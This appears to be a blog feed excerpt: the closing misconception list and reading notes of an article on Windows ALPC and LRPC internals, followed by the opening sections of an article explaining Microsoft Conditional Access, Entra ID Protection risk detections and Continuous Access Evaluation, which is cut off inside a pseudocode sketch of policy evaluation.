Wrong answer: yes. Right answer: every service that exposes an LRPC interface is. Services that expose only `ncacn_np` (named-pipe RPC) or `ncacn_ip_tcp` (TCP RPC) are not reachable over ALPC, even when the caller is on the same machine [@msdocs-protseq]. The print spooler, for example, exposes its primary interface over named pipes and is the trigger for several of the named-pipe-Potato attacks; AppInfo, Task Scheduler, and the endpoint mapper expose theirs over LRPC and are reachable through the kernel ALPC fabric. The right mental model is "every Windows service that wants to be reachable locally with first-class kernel-mediated transport uses LRPC on ALPC", not "every service uses ALPC." Wrong answer: yes. Right answer: the DCOM-activation Potatoes (RoguePotato [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato) exercise LRPC-on-ALPC because local DCOM activation rides that fabric; the impersonation primitive is `RpcImpersonateClient` inside the activated COM server. The named-pipe Potatoes (EfsPotato, PrintSpoofer [@itm4n-printspoofer], PetitPotam) use `ImpersonateNamedPipeClient` [@msdocs-impnp] as the impersonation primitive and exercise the named-pipe fabric. The trigger transport can be shared (DCOM, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises. See Section 8 for the 30-second classifier and the HITB 2021 Pierini and Cocomazzi talk [@hitb-potatoes] for the canonical end-to-end family classification. Wrong answer: yes. Several secondary writeups (and the original input premise for this article) say so. Right answer: named connection ports have Object Manager names, typically under `\RPC Control` or per-session AppContainer subtrees. The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles. This is the structural correction Section 4 walks in full and the load-bearing invariant the Vista redesign rests on: only the parties that completed the handshake can address the per-connection channel. The kernel does not let anyone else find it because there is no name to find. Wrong answer: yes, it is in the SDK. Right answer: partially. Microsoft *does not* publish a Win32 or WDK API reference for the `Nt*Alpc*` and `Alpc*` surface; the de facto syscall reference is NtDoc [@ntdoc-ntalpc], and the de facto structure reference is Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp]. Microsoft *does* document ALPC architecturally in *Windows Internals 7th Edition Part 2* [@wininternals-7e], Chapter 8 section "Advanced local procedure call (ALPC)"; through the `Microsoft-Windows-Kernel-ALPC` ETW provider [@msdocs-etwsys]; and indirectly through the user-mode RPC runtime documentation. The documentation gap is a deliberate choice -- Microsoft's position is that application authors should use the RPC runtime, not the kernel ALPC API -- and the gap is the reason the public knowledge of ALPC comes from a handful of named researchers reverse-engineering it. Wrong answer: yes, the abbreviations collide so they must be related. Right answer: LPC was the original Windows NT 3.1-through-Server-2003 kernel IPC primitive, replaced by ALPC in Vista (November 2006) and removed from the kernel by Windows 7 [@csandker-alpc]. LRPC is the Microsoft RPC runtime's *transport* selected when `ncalrpc` is the protocol sequence [@msdocs-protseq]; it has always lived inside `rpcrt4.dll`, and it rides on top of kernel ALPC ports. The two entities are at different layers (kernel object vs user-mode transport) and were named a decade apart -- LRPC in 1994, ALPC in 2006. The abbreviation collision is real; the entities are not the same thing. Wrong answer: on the Trail of Bits blog. Right answer: it does not exist under that title. The input premise for this article (and several AI-generated summaries circulating in 2024-2025) referenced a *Trail of Bits "ALPC Internals" series* by Shafir. The Trail of Bits author page for Yarden Shafir [@tob-shafir-author] lists her actual posts; the kernel-IPC posts are *Introducing Windows Notification Facility's WNF Code Integrity* (May 2023) [@tob-wnf] and *ETW Internals for Security Research and Forensics* (November 2023) [@tob-etw]. Her dedicated ALPC material lives in her conference training surface, indexed via the Winsider Seminars author page [@winsider-yarden]. The cousin posts (WNF and ETW) are the right Trail of Bits citations for the architectural-cousin framing.

Note: Three sources are worth the rest of an afternoon. Christian Sandker's three-part Offensive Windows IPC series [@csandker-alpc] [@csandker-rpc] [@csandker-np] is the highest-signal practitioner walkthrough of LPC, ALPC, LRPC, and named pipes available for free on the open web. Windows Internals 7th Edition Part 2 Chapter 8 section Advanced local procedure call (ALPC) [@wininternals-7e] is the Microsoft-blessed architectural reference; cite by ISBN 978-0-13-546238-6. James Forshaw's December 17, 2019 Project Zero post Calling Local Windows RPC Servers from .NET [@forshaw-rpc-2019] is the canonical introduction to the NtObjectManager tooling and the methodology change it unlocked. For the sister-article context in this series: the Object Manager Namespace post explains the \RPC Control parent that every named ALPC connection port lives under, and the upcoming Potato sister post walks the DCOM-activation and named-pipe sub-families through to a working PoC.

The kernel did its job at the port-DACL layer. The application disclaimed responsibility at the interface-callback layer. Almost every Patch-Tuesday LRPC fix since 2018 is some recombination of those two halves, and the half the kernel cannot fix is the half that keeps shipping.

The named-researcher canon for ALPC -- Forshaw, Shafir, csandker, Cerrudo, Cocomazzi, Pierini, Rouault, Imbert, Ormandy, Chappell -- is what this article is an attempt to read in one place.

Who Decided This Token Is Good? A Field Guide to Conditional Access and Entra ID Protection

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Conditional Access is Microsoft's Zero Trust policy engine, not a feature.** Every interactive sign-in to a licensed Microsoft 365 tenant flows through three planes: a signal plane (Entra ID Protection's machine-learning risk scoring), a policy plane (Conditional Access's JSON rule evaluator), and a session plane (Continuous Access Evaluation's event-driven revocation channel). This article assembles the wire format of all three -- the `riskDetection` resource on Microsoft Graph, the `conditionalAccessPolicy` schema, the `cp1` client capability that opts a client into 28-hour tokens, and the `401 + insufficient_claims` claims challenge -- into one end-to-end picture, then names the five things this architecture fundamentally cannot do.

1. Who decided this token is good?

It is 09:02 on a Tuesday in Lisbon. Alice opens Outlook on a managed laptop in a hotel and the reading pane populates with mail in under a second. She did not type a password. She did not approve a push. She did not touch a hardware key.

Who decided that was fine?

The question is harder than it looks. Alice's password lives in a token cache from yesterday's sign-in at the office. Outlook's client silently acquires a fresh access token from Entra. That request may match a Conditional Access policy. The policy may consult an Identity Protection risk score. The result is either an access token or a refusal. Exchange Online receives the token, validates it, and may yet revoke it mid-session because something changed in the last sixty seconds. Bytes return to Alice.

Microsoft Entra ID's policy engine for evaluating sign-in attempts. A Conditional Access policy is a JSON object that matches a set of users, cloud apps, and conditions (network location, device state, sign-in risk, user risk, client app, platform) against a set of grants (block, require MFA, require compliant device, require Authentication Strength, and so on). Policies are evaluated after first-factor authentication; a block grant in any matching policy overrides all allow grants [@ms-ca-overview]. The machine-learning signal plane that scores sign-ins and users for risk. ID Protection emits `riskDetection` events tagged with `riskEventType` (anonymized IP, leaked credentials, password spray, atypical travel, and roughly two dozen others), `riskLevel` (low, medium, high), `riskState`, and `detectionTimingType` (realtime, nearRealtime, or offline). Available only on Microsoft Entra ID P2 [@ms-id-protection-overview]. The session plane. CAE is an event-driven channel between Microsoft Entra and CAE-aware resource APIs (Exchange Online, SharePoint Online, Teams, Microsoft Graph). When a critical event fires -- account disabled, password reset, high user risk, network location change -- the resource API returns `HTTP 401` with a `WWW-Authenticate: Bearer error="insufficient_claims"` challenge. The client replays the embedded claims to Entra and acquires a fresh token. In exchange for this channel, CAE tokens live up to 28 hours [@ms-cae-concept].

Every component in this chain is individually documented on Microsoft Learn. The Conditional Access policy schema is on the Graph reference [@ms-graph-capolicy]. The riskDetection resource is on the Graph reference too [@ms-graph-riskdetection]. The cp1 client capability is in the claims-challenge document [@ms-claims-challenge]. The "up to 15 minutes" propagation ceiling for CAE non-IP events is in the CAE concept document [@ms-cae-concept].

But the chain is not assembled anywhere. That is what this article does.

This article is for the architect or the detection engineer who already knows what a JWT is, what a service principal is, and what an MDM does. If you have ever stared at a Sign-in log entry that reads "Conditional Access: Success" and wondered what exactly the policy engine concluded, this is for you.

Three moments of insight are coming. First, why MFA without context fails not because MFA is weak but because the unit is wrong (Section 3). Second, why the architectural breakthrough was a separation and not a new algorithm (Section 5). Third, why the system has limits that no engineering will fix (Section 8).

How did the industry end up with a token-issuance and claims-challenge model? The answer begins in 1975, with a paper that did not mention identity once.

2. From perimeter to identity boundary

In September 1975, Jerome Saltzer and Michael Schroeder published an eight-principle paper on operating-system protection that nobody at MIT thought of as a paper about cloud identity [@saltzer-schroeder-1975]. Half a century later, two of those eight -- complete mediation and least privilege -- are the implicit theorems every Conditional Access policy evaluates against. Where did the industry go in between?

Saltzer and Schroeder: the unstated theorems

Complete mediation says "every access to every object must be checked for authority." Least privilege says "every program and every user of the system should operate using the least set of privileges necessary to complete the job." These are stated as design principles, not theorems. But they function as theorems for anyone building an access-control system: violate either of them and you have, by construction, a vulnerability. Conditional Access does not derive the principles. It re-states them as a JSON schema and a runtime evaluator.

Jericho Forum: the perimeter dissolves

In 2003, David Lacey of the Royal Mail and a loose affiliation of corporate CISOs began arguing, against the prevailing castle-and-moat consensus, that the corporate network perimeter could no longer be relied on as the trust boundary. The Jericho Forum formally launched under the Open Group umbrella in January 2004 [@wikipedia-jericho-forum]. They coined the term "de-perimeterisation" to describe what their member firms were already living: data and identity travelling outside the firewall faster than the firewall could be moved.

Microsoft's own retrospective puts the quote precisely: the Jericho Forum "promoted a new concept of security called de-perimeterisation that focused on how to protect enterprise data flowing in and out of your enterprise network boundary instead of striving to convince users and the business to keep it on the corporate network" [@simos-2020-jericho]. The first sentence of Microsoft Learn's CA overview today is a direct descendant: "modern security extends beyond an organization's network perimeter" [@ms-ca-overview].

Kindervag: the name

John Kindervag, then a principal analyst at Forrester Research, gave the model its marketable name in a September 2010 report titled "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-zero-trust]. Three tenets: all resources are accessed securely regardless of location; access control is on strict need-to-know and strictly enforced; all traffic is inspected and logged.

The label stuck. Microsoft Learn now calls CA "Microsoft's Zero Trust policy engine" in its first sentence [@ms-ca-overview]. The lineage from Kindervag's 14-page Forrester report to that sentence is direct.

The original Kindervag PDF is gated behind Forrester's paywall. The widely cited copy on ndm.net redirects to an unrelated managed-IT-services company; the only reliably accessible mirror is the Wayback Machine snapshot. Treat the lineage as well documented and the URL as a curiosity of how academic ideas survive the open web.

BeyondCorp: the alternative

In December 2014, Rory Ward and Betsy Beyer published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: [@ward-beyer-2014-beyondcorp]. The paper described Google's internal Zero Trust deployment: every request authenticated and authorized by an access proxy, no implicit network trust, device inventory and user identity as the inputs to access decisions. A follow-up in 2016 documented the production rollout [@osborn-2016-beyondcorp].

This is the architectural fork Section 7 returns to. BeyondCorp puts the policy engine in the data path, as a reverse proxy that sees every HTTP request. CA puts the policy engine at token issuance and re-evaluates via claims challenges. Both work. They are not interchangeable.

NIST SP 800-207: the vocabulary

In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207-2020]. It codified the U.S. federal reference architecture: a Policy Engine that decides, a Policy Administrator that effects the decision, and a Policy Enforcement Point that intercepts the access.

That trio is the vocabulary the Microsoft Learn CA documentation now uses. In the SP 800-207 mapping, Conditional Access is the Policy Engine and Policy Administrator; Exchange Online, SharePoint Online, Teams, and Microsoft Graph are the Policy Enforcement Points; Entra ID Protection is the trust algorithm that feeds the Policy Engine.

If you ever have to map Conditional Access to SP 800-207 for a compliance review, the cleanest correspondences are: PE = the CA evaluator inside Entra; PA = Entra's token issuer (because the decision is effected by issuing or refusing a token); PEP = the resource API (Exchange, SharePoint, Graph) that validates the token, plus, for CAE-aware resources, the same API enforcing claims-challenge revocation mid-session. ID Protection is the "trust algorithm" input to the PE.

The doctrine was settled by 2020. But Microsoft had already been trying to build a perimeter on identity for six years, starting in 2014 with a much smaller idea.

3. Per-user MFA and the limits of binary controls

In 2014, Microsoft's only cloud-era access control was a per-user toggle that said MFA: yes or MFA: no. The toggle worked. It was a real improvement over passwords alone. It also produced the most exploited security failure of the next decade: MFA fatigue [@weinert-2023-managed-policies].

How does a control improve security and create a new attack class at the same time?

The per-user MFA state machine

Per-user MFA lives on the user object as a tri-state: Disabled, Enabled, or Enforced. Microsoft Learn now says the quiet part out loud: "The best way to protect users with Microsoft Entra MFA is to create a Conditional Access policy" and "Don't enable or enforce per-user Microsoft Entra multifactor authentication if you use Conditional Access policies" [@ms-howto-mfa-userstates]. That guidance carries a generation of operational pain inside it. Mixing the two surfaces, in practice, produces unpredictable prompts: a CA policy says "no MFA required for this location," the per-user state says "always MFA," and the user gets prompted twice.

Note: Microsoft's explicit guidance is to pick one surface. If you have Entra ID P1 or higher, use Conditional Access. The per-user state should remain Disabled for those accounts. Mixed configurations produce both false-positive prompts and, occasionally, false-negative skips [@ms-howto-mfa-userstates].

Trusted IP rules: one-dimensional context

Office 365 added a second knob in the same era: "trusted IPs." Sign-ins from a configured public IP range would skip the MFA challenge [@ms-ca-network]. The idea was that "on the corporate network" meant "more trustworthy." This was reasonable in 2014. By 2017, it was already eroded by full-tunnel VPNs (every employee egresses through the corporate /16 from home), split-tunnel VPNs (some traffic does, some does not), and the realisation that "corporate network" had stopped being a useful synonym for "trusted." Trusted IP is one-dimensional context, and one dimension was not enough.

Security Defaults: the Free-SKU descendant

Since 22 October 2019, every new Entra ID tenant has Security Defaults turned on by default at creation [@ms-security-defaults]. Security Defaults is a tenant-wide on/off switch that requires MFA for all admin roles, MFA for users when they show risk, blocks legacy authentication, and forces MFA registration. Microsoft's number on the impact is striking: "more than 99.9% of those common identity-related attacks are stopped by using multifactor authentication and blocking legacy authentication" [@ms-security-defaults].

For Entra ID Free tenants in 2026, Security Defaults is still the only available baseline. There is no per-app policy, no per-risk gating, no Conditional Access. This is the licensing reality Section 10 returns to.

Active Directory Federation Services -- AD FS -- is the on-prem federation product that ran the access-control story before any of this. It is still operational in many tenants. It is no longer Microsoft's strategic identity provider; the Microsoft Learn AD FS overview now opens with the explicit guidance "Instead of upgrading to the latest version of AD FS, Microsoft highly recommends migrating to Microsoft Entra ID" [@ms-ad-fs-overview]. AD FS claim rules functioned as a kind of policy engine, but they evaluated only at federation time and they had no concept of risk.

The four failure modes of the binary toggle

The first-generation controls -- per-user MFA, trusted IPs, Security Defaults -- share four documented limits:

No expression of context. The toggle is either on or off. It cannot say "MFA from a new country but not from the office."
Trusted IP is thin context. A public IP range is one bit of information; modern attacks include matching network egress.
No per-app policy. The toggle applies to all apps the user accesses. You cannot say "MFA for the admin portal, not for Outlook."
No exclusion semantics for break-glass accounts. Emergency-access accounts need to be reachable when everything else has failed. The binary toggle either includes them or excludes them; it does not let you say "exclude these accounts but log every sign-in as a high-priority alert."

MFA fatigue: when a control becomes a credential

The canonical failure of the binary toggle is push-bombing. The attacker has the password. The system requires MFA. The user gets four "approve sign-in?" notifications during a morning meeting. One gets a thumbs-up by reflex. The system did exactly what it was configured to do.

The attack works because the control has no concept of whether this is a normal sign-in. The same flow runs whether the request originates from the user's office WiFi or an anonymizing proxy in another country. The MFA challenge carries no risk-weighted information; the user has no signal that this prompt is different from yesterday's prompt. Fatigue is the consequence. Microsoft's own Entra blog catalogued the attack pattern and the operational mitigations in the wake of the 2022 incident cluster [@ms-techcom-mfa-fatigue].

Focusing on password rules, rather than things that can really help -- like multi-factor authentication (MFA), or great threat detection -- is just a distraction. -- Alex Weinert, Microsoft Identity, July 2019 [@weinert-2019-password]

Weinert's 2019 piece is now infamous in the identity community for its title alone -- "Your Pa$$word doesn't matter." The argument was that a password's composition rules carry no information that helps the system tell a real user from an attacker; what does carry information is context. The system needed a place to put that context.

If MFA yes/no cannot express context, the next step is obvious: make context the input. But to make context the input, the system needs a place to put it. The history of CA from 2015 forward is the history of giving context a home.

4. Generation by generation

The next eight years produced six generations of access control, each one closing a specific failure of the previous one. They look like product launches in a marketing chronology. They are something more interesting: a sequence of negative results, each followed by a positive engineering response.

timeline title Conditional Access timeline 2014 : Gen 1 per-user MFA and trusted IPs 2015 : CA enters public preview 2016 : Gen 2 Conditional Access general availability 2016 : ID Protection enters preview 2018 : Gen 3 risk-based CA conditions broadly available 2020 : CAE enters preview 2022 : Gen 4 Continuous Access Evaluation general availability 2023 : Gen 5 CA for workload identities 2023 : Gen 6 Microsoft-managed policies and Authentication Strengths 2026 : CA for AI agent identities

The 2026 milestone -- Conditional Access for AI agent identities -- is itself still emerging; Microsoft's current framing in the Conditional Access Optimization Agent announcement names it explicitly as a frontier rather than a finished generation [@ms-techcom-ca-optimization-agent]. Section 9.1 returns to the open problems.

Gen 1 (2014 to 2016): per-user MFA

Documented in Section 3. The control has no concept of context. The failure motivates Gen 2.

Gen 2 (September 2016 GA): Conditional Access with static rules

The September 27, 2016 CloudBlogs post announcing CA general availability framed it as "Protect your data at the front door" -- the "front door" framing that Microsoft documentation still uses [@ms-techcom-ca-frontdoor-2016]. The policy schema (users + cloud apps + conditions to grants) was introduced in the 2015 preview [@ms-techcom-ca-preview-2015] and survived essentially unchanged into 2016 GA.

Gen 2 closed Gen 1's failure mode: context now had a home. A policy could match on network location, on the app being accessed, on the user's group membership, on the device platform. It could express "block country X" or "require MFA when not on the corporate network."

The remaining documented limit: no risk feed. The engine could express what to check for but not whether this specific sign-in looks suspicious. A policy could block credential-stuffing attempts only if you happened to know in advance which IPs to deny. Motivated Gen 3.

Gen 3 (2017 to 2018): risk-based fusion

Identity Protection had been generating risk signals since its March 2016 preview. Through 2017 and 2018, two new condition keys appeared in the CA policy schema: signInRiskLevels and userRiskLevels. Both take values from the set low, medium, high. The risk feed plugged into the policy plane through exactly two keys. The legacy ID-Protection-side risk policies (which were a parallel policy surface inside ID Protection itself) are now retiring on 1 October 2026; the canonical surface is CA [@ms-id-protection-policies].

The remaining limit: pre-issuance only. The CA evaluator runs at sign-in time. Once a token is issued, the policy plane has no way to undo the decision until the token expires. Microsoft's own retrospective is honest about what they tried first: "Microsoft experimented with the 'blunt object' approach of reduced token lifetimes but found they degrade user experiences and reliability without eliminating risks" [@ms-cae-concept]. A one-hour token cuts the worst-case revocation latency to an hour, but it also means a user with intermittent connectivity gets prompted every hour, and a mobile app with retry storms can hammer the IdP. The trade-off was unacceptable. Motivated Gen 4.

Gen 4 (January 2022 GA): Continuous Access Evaluation

CAE inverted the trade-off. Instead of shortening the token, lengthen it -- up to 28 hours [@ms-cae-concept]. Then add a side channel: when a critical event fires (account disabled, password reset, high user risk, IP location change), the resource API issues an HTTP 401 with a WWW-Authenticate claims challenge, and the client replays to Entra for a fresh token. Latency on the side channel is bounded: "up to 15 minutes" for non-IP events, "instant" for IP locations [@ms-cae-concept]. CAE was tied to an emerging open standard from day one, the OpenID Continuous Access Evaluation Profile [@ms-cae-concept]. The general-availability announcement landed on 10 January 2022 [@ms-techcom-cae-ga-2022].

Remaining limit: applies to humans only. Service principals do not consume CAE-aware client libraries; they cannot perform a claims challenge. Motivated Gen 5.

Gen 5 (2023 GA): Conditional Access for workload identities

Same engine, constrained grant set. The Microsoft Learn page is blunt on the boundaries: "Workload Identities Premium licenses are required" and the constraint set is unusual -- "Policy can be applied to single tenant service principals that are registered in your tenant. Microsoft and third-party SaaS applications, including multitenant apps, are not covered by these policies. Managed identities aren't covered by policy" and "Under Grant, Block access is the only available option" [@ms-workload-identity-ca]. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product followed in late November 2022, and the Conditional Access feature for workload identities itself reached general availability later in 2023.

The single-tenant restriction is a structural choice. Multi-tenant SaaS apps appear in many tenants' service principal directories at once; policy scoping on them would require a cross-tenant resolution protocol the engine does not have. Managed identities are excluded because they belong to Azure subscriptions, not to user identity, and Microsoft has chosen not to extend the surface there. Group assignments do not work either: "Conditional Access policies assigned to a group that contains a service principal are not enforced for that service principal" [@ms-workload-identity-ca].

Remaining limit: under-configured in most tenants because the grant taxonomy is so narrow that admins do not see immediate value. Motivated Gen 6.

Gen 6 (November 2023 onwards): Microsoft-managed policies and Authentication Strengths

In November 2023, Alex Weinert announced Microsoft-managed Conditional Access policies: a set of baselines that Microsoft would auto-deploy into tenants in Report-only mode and then auto-enable after a waiting period [@weinert-2023-managed-policies]. The launch announcement specified a 90-day window [@helpnet-2023-microsoft-entra-policies]. The current Microsoft Learn documentation specifies "Microsoft enables these policies no less than 45 days after they're introduced in your tenant if they're left in the Report-only state" with a 28-day pre-enablement notification [@ms-managed-policies].

The window shrank deliberately. The 90-day window in the 2023 launch announcement was a calibration window; the 45-day window in current documentation is the post-calibration setting. Both numbers are correct in their respective time frames. The article uses the current number throughout.

Parallel to the managed policies, Microsoft shipped Authentication Strengths -- a named bundle of acceptable authentication methods that can be required as a grant. The three built-in strengths are MFA strength, Passwordless MFA strength, and Phishing-resistant MFA strength (FIDO2 security key, Windows Hello for Business, multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the modern way to express "no adversary-in-the-middle phishing kit should be able to defeat this grant."

The pattern: extension, not replacement

From Gen 3 onward, each generation extends the prior schema rather than replacing it. The conditionalAccessPolicy JSON shape that shipped in 2016 still drives the engine in 2026 -- with new condition keys added, new grant types added, new session controls added. By the standards of cloud control surfaces, that is a long run without a rewrite.

The reason is the architectural decision the next section is about.

5. The two-plane separation

The breakthrough is not a model, not a token format, not a wire protocol. It is a separation: the signal plane that produces risk detections from the policy plane that consumes them.

Stated like that, it sounds banal. Read it the other direction -- a policy engine whose risk model can change without changing the policy semantics, and whose policy can change without retraining the model -- and it is the design that makes the system maintainable at trillions of daily signals across hundreds of thousands of tenants.

The two planes, precisely

The signal plane is Microsoft Entra ID Protection. It runs detection logic on every interactive sign-in (and, for offline detections, on historical sign-ins) and emits a riskDetection resource into a per-tenant log on Microsoft Graph at /identityProtection/riskDetections. Each detection carries five fields you care about: riskEventType (one of about two dozen named detection types like anonymizedIPAddress, leakedCredentials, unlikelyTravel), riskLevel (low, medium, high, plus the bookkeeping values hidden and none), riskState (atRisk, confirmedCompromised, dismissed, remediated), detectionTimingType (realtime, nearRealtime, offline), and additionalInfo (a JSON blob with user-agent, IP, alert URL, reason codes) [@ms-graph-riskdetection][@ms-id-protection-risks].

The policy plane is Conditional Access. It is a JSON object at /identity/conditionalAccess/policies/{id} on the Graph API [@ms-graph-capolicy]. Each policy has displayName, state (enabled, disabled, enabledForReportingButNotEnforced), conditions, grantControls, and sessionControls. The conditions block contains the per-policy targeting: which users, which apps, which platforms, which network locations -- and two condition keys named signInRiskLevels and userRiskLevels.

**Sign-in risk** is a per-sign-in probability that the credential being used is being used by someone other than the legitimate owner *at this moment*. **User risk** is a per-user probability that the account itself has been compromised over its recent history. A user with leaked credentials in a breach corpus carries persistent user risk until the password is reset; a user signing in from an anonymizing proxy carries sign-in risk for that session. CA policies can match on either, both, or neither. Risk-based conditions require Entra ID P2 [@ms-id-protection-policies].

Those two condition keys -- signInRiskLevels and userRiskLevels -- are the entire API surface between the signal plane and the policy plane. Everything else about ID Protection is hidden behind them. The policy plane does not know whether high came from a transformer or a logistic regression or a hardcoded rule. The signal plane does not know which policies will read its output. The contract is two strings.

flowchart LR subgraph SP[Signal plane Entra ID Protection] DET[Detection pipeline] RD[(riskDetection log)] RL[Risk level low medium high] end subgraph PP[Policy plane Conditional Access] EV[Policy evaluator] POL[(conditionalAccessPolicy JSON)] TOK[Token issuer] end subgraph SES[Session plane CAE] CH[Critical event channel] RP[Resource API] end DET --> RD DET --> RL RL -. signInRiskLevels userRiskLevels .-> EV POL --> EV EV --> TOK TOK -- access token --> RP DET -. user risk events .-> CH CH -. 401 insufficient claims .-> RP

Why the separation matters

Three concrete consequences fall out of the design:

The risk model is re-trainable without policy rewrites. Microsoft's ID Protection team can change the underlying detection algorithm tomorrow. Add a new riskEventType. Replace the classifier for unlikelyTravel. Re-tune the threshold that maps a score to low/medium/high. None of these require tenants to rewrite their CA policies, because policies match on the level, not the signal.

Tenants without the licence simply do not use the risk conditions. An Entra ID P1 tenant can deploy CA policies that match on users, apps, locations, devices, client apps, and platforms. P2 unlocks the risk conditions. The schema accommodates both: P1 policies just leave the risk arrays empty. There is no parallel policy surface for the non-risk-aware tenants; they use the same engine.

CAE is a third plane layered onto the same skeleton. Continuous Access Evaluation did not require redesign of the policy plane. The CAE channel is a new event delivery mechanism; the events it propagates are things the signal plane already knew about (high user risk, password reset, account disabled) plus new ones the policy plane introduced (network-location-policy changed). The architecture absorbed CAE because the design was already a separation of concerns.

Key idea: The signal plane and the policy plane are separable; the contract between them is two condition keys (signInRiskLevels and userRiskLevels). That is what makes the system maintainable across a decade of evolution.

The "pit of success" framing

Alex Weinert calls this the "pit of success." His November 2023 piece on Microsoft-managed policies put the metric on it: a decade ago Microsoft turned on a "radical" tenant-wide policy requiring MFA for every consumer Microsoft account, and "today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication" [@weinert-2023-managed-policies].

The 100 percent number is achievable because the policy plane and the signal plane can each evolve independently. Microsoft can ship a managed policy that says "require MFA for high-risk sign-ins" without committing to a fixed definition of "high risk." The definition lives on the signal plane and changes weekly. The policy lives on the policy plane and is stable for years.

With the separation as the spine, the next section walks the end-to-end pipeline in one continuous trace, from signal to grant to token to session, on a real sign-in -- the trace no public Microsoft document assembles in one place.

6. The end-to-end pipeline

Take Alice's Tuesday morning from Section 1 and walk it forward. This section has six subsections. By the end of them, the question "who decided?" has six independently sourced answers and one combined picture.

6.1 What the signal plane sees

Identity Protection's detection taxonomy splits into five rough groups, based on what kind of information triggered the detection. The canonical taxonomy is the Microsoft Learn page on risk types [@ms-id-protection-risks]; the wire-format enum on the Graph schema is at [@ms-graph-riskdetection].

Network signals. anonymizedIPAddress, maliciousIPAddress, nationStateIP, riskyIPAddress. The signal is the source IP and reputation databases that ID Protection ingests.
Behavioural signals. unlikelyTravel, mcasImpossibleTravel, newCountry, unfamiliarFeatures, anomalousUserActivity. The signal is a deviation from the tenant's or the user's historical baseline.
Credential signals. leakedCredentials, passwordSpray. The signal is a match against a corpus of breached credentials or a velocity-based pattern across tenants.
Token and session signals. anomalousToken, tokenIssuerAnomaly, attemptedPrtAccess, attackerinTheMiddle, authenticatorPhishing. The signal is on the token itself or on the way the authenticator flow ran.
Inbox behaviour. suspiciousInboxForwarding, mcasSuspiciousInboxManipulationRules. The signal is on what happened after the sign-in -- a post-compromise indicator that retroactively flags the sign-in that enabled it.

Each detection is also tagged with a timing: real-time, near-real-time, or offline. Microsoft Learn is precise about the latencies: "Detections triggered in real-time take 5-10 minutes to surface details in the reports. Offline detections take up to 48 hours" [@ms-risk-detection-types].

The detection is mapped to a risk level, not a probability. Microsoft Learn calls the level "calculated by our machine learning algorithms" and explicitly notes the meaning: low/medium/high "represent how confident Microsoft is that one or more of the user's credentials are known by an unauthorized entity" [@ms-risk-detection-types]."Confidence" here is meant in the everyday sense, not the strict statistical sense of a confidence interval. Microsoft has not published a calibration study that would let you map a "high" risk level to a frequentist probability of compromise.

The figure you sometimes see in Microsoft marketing materials -- "more than 100 trillion signals processed per day" [@ms-managed-policies], or, in older sources, "78 trillion" [@ms-id-protection-overview] -- is the aggregate signal volume across all tenants and product surfaces, not per-sign-in features per user. The article keeps the two carefully separate.

Microsoft has not publicly disclosed the production model architecture, the feature vector size, or per-detection precision and recall. The 2021 Microsoft Security Blog interview with Maria Puertas Calvo describes the existence of the ML team and the operational scale ("hundreds of terabytes every day") but stops well short of architecture details [@ms-puertas-calvo-interview]. The model class is publicly unspecified; the taxonomy and the operating output are both public.

6.2 How risk surfaces

Two parallel logs matter for risk. The Sign-in log is the universe: every interactive and non-interactive sign-in produces an entry. The riskDetections log is the sparse overlay: a riskDetection is emitted only when a detection fires for the sign-in. Most sign-ins produce a Sign-in log entry with no corresponding riskDetection. Only flagged sign-ins do [@ms-graph-riskdetection].

This is a common source of confusion. It is tempting to assume "ID Protection scored every sign-in," and in a sense it did -- the detectors ran -- but the durable artefact exists only when at least one detector fired. To compute a per-sign-in distribution of risk you need to join the Sign-in log with the riskDetections log and treat the unjoined rows as "no risk flagged at the moment of issuance."

There is one more wrinkle. The detection taxonomy on the Microsoft Learn concept page and the riskEventType enum on the Graph schema are not perfectly aligned. The concept page lists mcasImpossibleTravel and authenticatorPhishing as named detection types; the Graph enum lists impossibleTravel (without the mcas prefix). The two surfaces sometimes use different value names for the same logical detection -- a UI display string versus a Graph enum value. Detection engineers writing KQL against the Sign-in logs should account for both.

6.3 How CA consumes risk

Conditional Access evaluation runs in a fixed order: assignments are checked first (does this sign-in match this policy at all?), then conditions (do all the condition predicates hold?), then grants (which controls are demanded?), then session controls (which token lifetime, sign-in frequency, persistent browser).

The key semantic, repeated across the Microsoft Learn documentation: a block grant in any policy matching the sign-in overrides any allow grant in any other policy. The policy plane is not just additive; it has an explicit precedence rule.

flowchart TD A[Sign-in request] --> B[First-factor auth] B --> C[Enumerate matching policies] C --> D{Any policy matches?} D -- No --> E[Default allow with token] D -- Yes --> F[Evaluate conditions per policy] F --> G{Block grant in any match?} G -- Yes --> H[Deny access return error] G -- No --> I[Aggregate required grants] I --> J{All grants satisfied?} J -- No --> K[Issue challenge MFA or device] J -- Yes --> L[Apply session controls] L --> M[Issue access token]

The pseudocode below is a compressed restatement of that flow. It is not Microsoft source code; it is the algorithmic shape an admin should keep in their head when reading a policy or debugging a sign-in.

{` function evaluate(signin) { const matching = allPolicies.filter(p => p.state !== 'disabled' && matchesAssignments(p.conditions, signin) && matchesConditions(p.conditions, signin) );

// Block precedence: any block grant wins if (matching.some(p => p.grantControls.builtInControls.includes('block'))) { return { decision: 'DENY', reason: 'block grant matched' }; }

// Aggregate required grants across matching policies const requiredGrants = new Set(); for (const p of matching) { for (const g of p.grantControls.builtInControls) requiredGrants.add(g); if (p.grantControls.authenticationStrength) { requiredGrants.add('authStrength:' + p.grantControls.authenticationStrength.id); } }

const satisfied = [...requiredGrants].every(g => signin.satisfies(g)); if (!satisfied) { return { decision: 'CHALLENGE', missing: [...requiredGrants].filter(g => !signin.satisfies(g)) }; }

// Apply session controls (token lifetime, sign-in frequency, persistent browser) const session = mergeSessionControls(matching.map(p => p.sessionControls)); return { decision: 'ALLOW', session }; }

